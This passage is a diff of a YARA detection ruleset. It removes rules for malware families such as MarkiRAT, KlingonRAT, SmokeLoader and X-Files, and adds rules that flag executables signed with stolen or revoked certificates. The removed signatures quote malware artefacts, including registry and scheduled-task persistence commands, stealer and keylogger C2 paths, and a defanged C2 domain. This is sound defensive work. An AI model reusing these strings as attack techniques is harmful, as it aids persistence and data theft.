+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6256-L6279"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2118-L2129"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "be0ecf8a97d289b15b902420d769925b7b22ab835bd7d10d10b059119f41e540"
+		logic_hash = "9981e0aed672ebfcbe7f0bc1eee6a26a1523b8577d5ee572612aaebf23d1fbcf"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "rundll32.exe advapi32.dll,ProcessIdleTasks" wide
-		$s2 = "CommandExecute" fullword ascii
-		$s3 = "DownloadExecuteUrl" fullword ascii
-		$s4 = "DownloadExecuteFile" fullword ascii
-		$s5 = "CmdExecute" fullword ascii
-		$s6 = "ExecuteProcessWithResult" fullword ascii
-		$s7 = "IsFirstInstance ==> checked" fullword wide
-		$s8 = "del \"%PROG%%SERVICENAME%\".*" fullword wide
-		$s9 = ".CreateConfig" wide
-		$s10 = ".SelfDelete" wide
-		$c1 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; EmbeddedWB 14.52 from: http://www.google.com/ EmbeddedWB 14.52;" wide
-		$c2 = "boot.php" wide
-		$c3 = "lastupdate.php" wide
-		$c4 = "main.php" wide
-		$c5 = "InternetNeeded" wide
-		$c6 = "DeviceIdSalt" wide
+		thumbprint = "45d598691e79be3c47e1883d4b0e149c13a76932ea630be429b0cfccf3217bc2"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 6 of ( $s* ) or 4 of ( $c* ) or 8 of them )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "StarY Media Inc." and pe.signatures [ i ] . serial == "3b:ca:ed:3e:f6:78:f2:f9:bf:38:d0:9e:14:9b:8d:70" )
 }
-rule DITEKSHEN_MALWARE_Win_Apostle : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_091736D368A5980Ebeb433A0Ecb49Fbb : FILE
 {
 	meta:
-		description = "Detects Apsotle"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "6e6d2ef0-b709-5915-b644-db86d9d3f26a"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "fb9446b5-2d49-51de-bedb-ea541d415ae2"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6281-L6295"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2131-L2142"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "aa5a522383cbb7e2fdb90f4c4395c7f92f546aa1dbda8f44090225861f011630"
+		logic_hash = "858a98ba8fd3244b2c0f6d3dd89a294b0187dd1a82cdcca67c162985d80ca6ed"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "bytesToBeEncrypted" fullword ascii
-		$s2 = "SelfDelete" fullword ascii
-		$s3 = "ReadMeFileName" ascii
-		$s4 = "DesktopFileName" ascii
-		$s5 = "SetWallpaper" fullword ascii
-		$s6 = "get_EncryptionKey" fullword ascii
-		$s7 = "disall" fullword ascii
+		thumbprint = "b1c1dc94f0c775deeb46a0a019597c4ac27ab2810e3b3241bdc284d2fccf3eb5"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 6 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ELEKSIR, OOO" and pe.signatures [ i ] . serial == "09:17:36:d3:68:a5:98:0e:be:b4:33:a0:ec:b4:9f:bb" )
 }
-rule DITEKSHEN_MALWARE_Win_DEADWOOD : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00E48Cb3314977D77Dedcd4C77Dd144C50 : FILE
 {
 	meta:
-		description = "Detects DEADWOOD"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "a75e30d8-75ec-5eaf-94f5-5556a3b947ae"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "9b708e1b-a878-5244-8fe2-3061f058a9ab"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6297-L6313"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2144-L2155"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "bf53abc801971b294e0a23bb0162ceb7c56a563a16e73c317f6a890ba545b67d"
+		logic_hash = "a2ca0ce3812be5e46cb0bc9c73fc4f31294c8d594ca821ad924a3f06cf2430ca"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "Service Start Work !!!!" fullword ascii
-		$s2 = "Error GetTokenInformation : " fullword ascii
-		$s3 = "\\Windows\\System32\\net.exe" fullword wide
-		$s4 = "App Start Work !!!!" fullword ascii
-		$s5 = "vmmouse" fullword wide
-		$s6 = "CDPUserSvc_" wide
-		$s7 = "WpnUserService_" wide
-		$s8 = "User is :" wide
-		$s9 = "\\params" fullword ascii
+		thumbprint = "025bce0f36ec5bac08853966270ed2f5e28765d9c398044462a28c67d74d71e1"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 6 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BESPOKE SOFTWARE SOLUTIONS LIMITED" and pe.signatures [ i ] . serial == "00:e4:8c:b3:31:49:77:d7:7d:ed:cd:4c:77:dd:14:4c:50" )
 }
-rule DITEKSHEN_MALWARE_Win_Turian : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_1E72A72351Aecf884Df9Cdb77A16Fd84 : FILE
 {
 	meta:
-		description = "Hunt for Turian / Qurian"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "eafa9442-a01b-5044-bc47-634297a3efcc"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "7972befe-3a88-5ea5-a865-3d008b712bc9"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6315-L6343"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2157-L2168"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "87f4263381c5e93fcba0873aa3bb9a1db4b21225141cd7f06be30f5777a47806"
+		logic_hash = "6555b89f1643f2e461a936df402dcbe8dd5100a1def76c7c6d8f792d1c0ed006"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "d1218ab9d608ee0212e880204e4d7d75f29f03b77248bca7648d111d67405759"
-		cnc_domain = "windowsupdate[.]dyndns[.]info"
-		cnc_ip = "58[.]158[.]177[.]102"
-
-	strings:
-		$s1 = "%s a -m5 -hp1qaz@WSX3edc -r %s %s\\*.*" ascii wide
-		$s2 = "%s a -m5 -hpMyHost-1 -r %s %s\\*.*" ascii wide
-		$s3 = "%s a -m5 -hp1qaz@WSX3edc -ta%04d%02d%02d000000 -r %s c:" ascii wide
-		$s4 = "%s a -m5 -hpMyHost-1 -ta%04d%02d%02d000000 -r %s c:"
-		$s5 = "cmd /c dir /s /O:D %s>>\"%s\"" ascii wide
-		$s6 = "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /v %s /t REG_SZ /d \"%s\" /f" fullword ascii
-		$s7 = "Not Connect!" fullword ascii
-		$p1 = "RECYCLER\\S-1-3-33-854245398-2067806209-0000980848-2003\\" ascii wide
-		$p2 = "%sRECYCLER.{S-1-3-33-854245398-2067806209-0000980848-2003}\\" ascii wide
-		$p3 = "\\RECYCLER.{S-1-3-33-854245398-2067806209-0000980848-2003}\\" ascii wide
-		$p4 = "\\RECYCLER.{645ff040-5081-101b-9f08-00aa002f954e}\\" ascii wide
-		$p5 = "%sRECYCLER.{645ff040-5081-101b-9f08-00aa002f954e}\\" ascii wide
-		$c1 = "CONNECT %s:%u HTTP/1." ascii wide
-		$c2 = "User-Agent: Mozilla/4.0" ascii wide
-		$m1 = "winsupdatetw" fullword ascii wide
-		$m2 = "clientsix" fullword ascii wide
-		$m3 = "updatethres" fullword ascii wide
-		$m4 = "uwatchdaemon" fullword ascii wide
+		thumbprint = "f945bbea1c2e2dd4ed17f5a98ea7c0f0add6bfc3d07353727b40ce48a7d5e48f"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 3 of ( $s* ) or ( all of ( $c* ) and ( 2 of ( $s* ) or 1 of ( $m* ) or 1 of ( $p* ) ) ) or ( 1 of ( $m* ) and 1 of ( $s* ) and ( 1 of ( $c* ) or 1 of ( $p* ) ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Buket and Co." and pe.signatures [ i ] . serial == "1e:72:a7:23:51:ae:cf:88:4d:f9:cd:b7:7a:16:fd:84" )
 }
-rule DITEKSHEN_MALWARE_Win_Dlagent14 : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00B383658885E271129A43D19De40C1Fc6 : FILE
 {
 	meta:
-		description = "Detects downloader injector"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "6f80567e-b89a-557d-a282-b61c0b99625e"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "47389dc4-8092-5e12-91a1-f370c9c507a9"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6365-L6378"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2170-L2181"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "2806b553635dbf96e9c00d3554dd5732df64200b3ae2c4845a2675218bd56387"
+		logic_hash = "9312bc8f1005d71393ab63f05bdabff52752ad939dd4311485dc4b56f75eece9"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "%ProgramData%\\AVG" fullword wide
-		$s2 = "%ProgramData%\\AVAST Software" fullword wide
-		$s3 = "%wS\\%wS.vbs" fullword wide
-		$s4 = "%wS\\%wS.exe" fullword wide
-		$s5 = "CL,FR,US,CY,FI,HR,HU,RO,PL,IT,PT,ES,CA,DK,AT,NL,AU,AR,NP,SE,BE,NZ,SK,GR,BG,NO,GE" ascii
-		$s6 = "= CreateObject(\"Microsoft.XMLHTTP\")" ascii
+		thumbprint = "ef234051b4b83086b675ff58aca85678544c14da39dbdf4d4fa9d5f16e654e2f"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 5 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Elekon" and pe.signatures [ i ] . serial == "00:b3:83:65:88:85:e2:71:12:9a:43:d1:9d:e4:0c:1f:c6" )
 }
-rule DITEKSHEN_MALWARE_Win_Markirat : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00Ca7D54577243934F665Fd1D443855A3D : FILE
 {
 	meta:
-		description = "Detects MarkiRAT"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "6cfa276c-a64e-532a-a1ae-11a9e00867bd"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "8519119d-a37b-5438-a642-48e1d40024b8"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6380-L6403"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2183-L2194"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "17b8bcfe8d2b4c87ff8e0bddb436e18029a3b28a5ad3994fe9bef359588d9cad"
+		logic_hash = "867844464609a043902f07aad3fa568b482259655bc181d992bd409437165790"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$pdb = "\\mfcmklg.pdb" ascii
-		$s1 = "runinhome Completed" wide
-		$s2 = "ERROR find next file<br>" wide
-		$s3 = "<br><mark>Hello: %s</mark>" wide
-		$s4 = "<br><mark>CLIPBOARD[" wide
-		$s5 = "@userhome@" wide
-		$s6 = "Global\\{2194ABA1-BFFA-4e6b-8C26-D1BB20190312}" wide
-		$s7 = "taskkill /im svehost.exe /t /f" fullword ascii
-		$s8 = "taskkill /im keepass.exe /t /f" fullword ascii
-		$ba = /bitsadmin \/(addfile|cancel|SetPriority|resume)/ ascii wide
-		$c1 = "/ech/client.php?u=" wide
-		$c2 = "/up/uploadx.php?u=" wide
-		$c3 = "/ech/echo.php?req=rr&u=" wide
-		$c4 = "/ech/rite.php" wide
-		$c5 = "http://microsoft.com-view.space/i.php?u=" wide
-		$c6 = "Content-Disposition: form-data; name=\"uploadedfile\"; filename=\"" ascii
+		thumbprint = "2ea2c7625c1a42fff63f0b17cfc4fd0c0f76d7eb45a86b18ec9a630d3d8ad913"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( $pdb and any of them ) or ( 5 of ( $s* ) ) or ( 3 of ( $c* ) ) or ( ( #ba > 3 and 4 of them ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FABO SP Z O O" and pe.signatures [ i ] . serial == "00:ca:7d:54:57:72:43:93:4f:66:5f:d1:d4:43:85:5a:3d" )
 }
-rule DITEKSHEN_MALWARE_Win_Klingonrat : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_7709D2Df39E9A4F7Db2F3Cbc29B49743 : FILE
 {
 	meta:
-		description = "Detects KlingonRAT"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "bea50bce-b38c-50a0-902a-1014615bd9b8"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "55e8815f-0885-5eb0-bf85-05bbd874a821"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6405-L6427"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2196-L2207"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "2abfbfc1b67f931f15bfdfd2cd4ba7821e62eb8c518bbc04629c0dd694bbd9c1"
+		logic_hash = "b63fa6e4e92549ae92b9a414390471c49fd50010bb7e10e1db72ff53370a6354"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$go = "Go build ID:" ascii
-		$s1 = "/UCRelease/src/client/uac/once/"
-		$s2 = "%T\\AppData\\Local\\Windows Update\\"
-		$s3 = "%TSoftware\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\"
-		$s4 = "wmic /namespace:'\\\\root\\subscription' PATH"
-		$s5 = "C:\\Windows\\System32\\fodhelper.exeCaption,ParentProcessId,ProcessId"
-		$s6 = "ldpro.exelsass.exeluall.exeluspt.exe"
-		$s7 = "scangui.exedeps/lsass.exeetrustcipe.exefile"
-		$s8 = "alogserv.exeaplica32.exeapvxdwin.exeatro55en.exeautodown.exeavconsol.exeavgserv9.exeavkwctl9.exeavltmain.exeavpdos32.exeavsynmgr.exeavwupd32.exeavwupsrv.exe"
-		$c1 = "%s/keyLogger?machineId=%s" ascii
-		$c2 = "%s/stealer?machineId=%s" ascii
-		$c3 = "%s/lsass?machineId=%s" ascii
-		$c4 = "%s/logger?machineId=%s" ascii
-		$c5 = "%s/machineInfo?machineId=%s" ascii
-		$c6 = "failurehttps://%s:%d/botif-modified-sinceillegal" ascii
+		thumbprint = "04349ba0f4d74f46387cee8a13ee72ab875032b4396d6903a6e9e7f047426de8"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( $go ) and ( 3 of ( $c* ) or 5 of ( $s* ) or ( 3 of ( $s* ) and 1 of ( $c* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Grina LLC" and pe.signatures [ i ] . serial == "77:09:d2:df:39:e9:a4:f7:db:2f:3c:bc:29:b4:97:43" )
 }
-rule DITEKSHEN_MALWARE_Win_Xfiles : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_186D49Fac34Ce99775B8E7Ffbf50679D : FILE
 {
 	meta:
-		description = "Detects X-Files infostealer (formerly BotSh1zoid)"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "3f8b2f9b-aa6a-5ffc-95b8-5e44de0d1a49"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "eeea3085-9fd7-5077-8c13-e0c4438b2e79"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6429-L6460"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2209-L2220"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "0c04a8f019aea36f4bba3ce8289c2d608c69d76bbf321052560b4ca2214be057"
+		logic_hash = "950b14787e707be843d1443a612c372ceb0c2830de20bce1f62317fa39149e5b"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "\\BotSh1zoid\\" ascii
-		$x2 = "\\BuildPacker.pdb" ascii
-		$x3 = "\\Svc_host.pdb" ascii nocase
-		$s1 = "WDefender" fullword ascii
-		$s2 = "CheckDefender" fullword ascii
-		$s3 = "RunPS" fullword ascii
-		$s4 = "DownloadFile" fullword ascii
-		$v1_1 = "<Pass encoding=\"base64\">(.*)</Pass>" wide
-		$v1_2 = "Grabber\\" wide
-		$v1_3 = "/log.php" wide
-		$v1_4 = /Browsers\\(Logins|Cards|Cookies)/ wide
-		$v1_5 = "<StealSteam>b__" ascii
-		$v1_6 = "record_header_field" fullword ascii
-		$v1_7 = "JavaScreenshotiptReader" fullword ascii
-		$v1_8 = "HTTPDebuggerPro" wide
-		$v1_9 = "IEInspector" wide
-		$v1_10 = "Fiddler" wide
-		$v2_1 = /get_(Cookie|Logins|Cards)Path/ fullword ascii
-		$v2_2 = "get_AllScreens" fullword ascii
-		$v2_3 = "{0}_{1}_{2}.zip" fullword wide
-		$v2_4 = "\\Stealer" fullword wide
-		$g1 = "$983a3552-4ec3-4936-bd4a-8e6fd67b4c67" fullword ascii
-		$g2 = "$a5d9ca4d-400f-4e07-8c09-a916b548f2e3" fullword ascii
-		$g3 = "$ebc25cf6-9120-4283-b972-0e5520d0000C" fullword ascii
+		thumbprint = "812a80556775d658450362e1b3650872b91deba44fef28f17c9364add5aa398e"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $x* ) and ( 3 of ( $s* ) or 3 of ( $v1* ) or 3 of ( $v2* ) ) ) or 7 of ( $v1* ) or 3 of ( $v2* ) or ( 2 of ( $g* ) and 3 of them ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Hairis LLC" and pe.signatures [ i ] . serial == "18:6d:49:fa:c3:4c:e9:97:75:b8:e7:ff:bf:50:67:9d" )
 }
-rule DITEKSHEN_MALWARE_Win_Allakore : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_0097Df46Acb26B7C81A13Cc467B47688C8 : FILE
 {
 	meta:
-		description = "Detects AllaKore"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "371663c1-6faf-5ca3-a79e-e4340d44660b"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "1c281766-abd4-534b-9442-233369e1f55e"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6462-L6493"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2222-L2233"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "0e93682787e27246cdddbd67ca5360728c65049a2e97e71809b5902854aa4bef"
+		logic_hash = "ab4da0ddd001acf9f8d78c4beb28c648f8516088561e3140739b4b41d93b58ef"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "AllaKore Remote - Chat" fullword wide
-		$x2 = "AllaKore Remote - Share Files" fullword wide
-		$x3 = "CYRUS - Chat" fullword wide
-		$x4 = "CYRUS - Share Files" fullword wide
-		$x5 = "<|REDIRECT|><|GETFOLDERS|>" fullword wide
-		$x6 = "<|REDIRECT|><|DOWNLOADFILE|>" fullword wide
-		$x7 = "<|REDIRECT|><|WHEELMOUSE|>" fullword wide
-		$x8 = "<|REDIRECT|><|SETMOUSE" wide
-		$x9 = "<|CHECKIDPASSWORD|>" fullword wide
-		$x10 = "<|KEYBOARDSOCKET|>" fullword wide
-		$x11 = "<|REDIRECT|><|CLIPBOARD|>" fullword wide
-		$x12 = "<|IDEXISTS!REQUESTPASSWORD|>" fullword wide
-		$x13 = "<|GETFULLSCREENSHOT|>" fullword wide
-		$x14 = "<|MAINSOCKET|>" fullword ascii
-		$s1 = "You can not connect with yourself!" wide
-		$s2 = "Waiting for authentication..." wide
-		$s3 = "Connected support!" wide
-		$s4 = "ID does nor exists." wide
-		$s5 = "Finding the ID..." wide
-		$s6 = "PC is Busy!" wide
-		$s7 = "Upload &  Execute" fullword ascii
-		$s8 = "Download file selected" fullword ascii
-		$s9 = "CaptureKeys_TimerTimer" fullword ascii
-		$s10 = "Remote File Manager" fullword ascii
+		thumbprint = "54c4929195fafddfd333871471a015fa68092f44e2f262f2bbf4ee980b41b809"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 4 of ( $x* ) or 4 of ( $s* ) or ( 3 of ( $s* ) and 2 of ( $x* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Information Civilized System Oy" and pe.signatures [ i ] . serial == "00:97:df:46:ac:b2:6b:7c:81:a1:3c:c4:67:b4:76:88:c8" )
 }
-rule DITEKSHEN_MALWARE_Win_Reverserat : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_2A52Acb34Bd075Ac9F58771D2A4Bbfba : FILE
 {
 	meta:
-		description = "Detects ReverseRAT"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "df13fc6c-025a-54db-809d-4f3c27b8aa7a"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "2d6b6ff5-e081-5e91-b03f-6e0d02afdb8f"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6495-L6514"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2235-L2246"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "87ab00a5588bfce04ec47a07b184fffe359e472ac8bf561b02a8b070edf2e014"
+		logic_hash = "9ffad34a94e9210bb98021c0ee0ddba4144406cca976537efe24e63367a295cd"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$pdb1 = "\\ReverseRat.pdb" ascii nocase
-		$pdb2 = "\\ReverseRat\\obj\\" ascii nocase
-		$s1 = "processCmd" fullword ascii
-		$s2 = "CmdOutputDataHandler" fullword ascii
-		$s3 = "sendingProcess" fullword ascii
-		$s4 = "SetStartup" fullword ascii
-		$s5 = "RunServer" fullword ascii
-		$s6 = "_OutputDataReceived" ascii
-		$s7 = { 63 00 6d 00 64 00 2e 00 65 00 78 00 65 00
-                00 03 0a 00 00 13 74 00 65 00 72 00 6d 00
-                69 00 6e 00 61 00 74 00 65 00 00 09 65 00
-                78 00 69 00 74 00 }
+		thumbprint = "c839065a159bec7e63bfdcb1794889829853c07f7a931666f4eb84103302c1c9"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $pdb* ) and 2 of ( $s* ) ) or 5 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Katarzyna Galganek mim e coc" and pe.signatures [ i ] . serial == "2a:52:ac:b3:4b:d0:75:ac:9f:58:77:1d:2a:4b:bf:ba" )
 }
-rule DITEKSHEN_MALWARE_Win_Smokeloader : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_5A9D897077A22Afe7Ad4C4A01Df6C418 : FILE
 {
 	meta:
-		description = "Detects SmokeLoader variants"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "e8f28f89-3a79-5d78-8c0a-bad16a57df84"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "e44fcc54-9d0c-5b9b-a34a-03f31ae5333d"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6516-L6539"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2248-L2259"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "65c56ed11a3cb4e4bcf8fd2a6be097545cb96e84ba4c4202969d1d163a2a36ed"
+		logic_hash = "f82b59f5d1996ae37b0cb7f7a799e2fcc7d9da0ffddfe63cbbb84b6f0e7e7b23"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "G2A/CLP/05/RYS" fullword wide
-		$x2 = "0N1Y/53R10U5/BU51N355" fullword wide
-		$x3 = "CH4PG3PB-6HT2VI9C-O2NL2NO5-QP1BW0EG" fullword wide
-		$s1 = "Azure-Update-Task" fullword wide
-		$s2 = "C:\\Windows\\System32\\schtasks.exe" fullword wide
-		$s3 = "/C /create /F /sc minute /mo 1 /tn \"" fullword wide
-		$s4 = "\\Microsoft\\Network" fullword wide
-		$s5 = "\\Microsoft\\TelemetryServices" fullword wide
-		$s6 = "\" /tr \"" fullword wide
-		$e1 = "\\sqlcmd.exe" fullword wide
-		$e2 = "\\sihost.exe" fullword wide
-		$e3 = "\\fodhelper.exe" fullword wide
+		thumbprint = "50fa9d22557354a078767cb61f93de9abe491e3a8cb69c280796c7c20eabd5b9"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $x* ) and 4 of ( $s* ) ) or ( 5 of ( $s* ) and 1 of ( $e* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Klarens LLC" and pe.signatures [ i ] . serial == "5a:9d:89:70:77:a2:2a:fe:7a:d4:c4:a0:1d:f6:c4:18" )
 }
-rule DITEKSHEN_MALWARE_Win_Dlinjector03 : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00D7C432E8D4Edef515Bfb9D1C214Ff0F5 : FILE
 {
 	meta:
-		description = "Detects unknown loader / injector"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
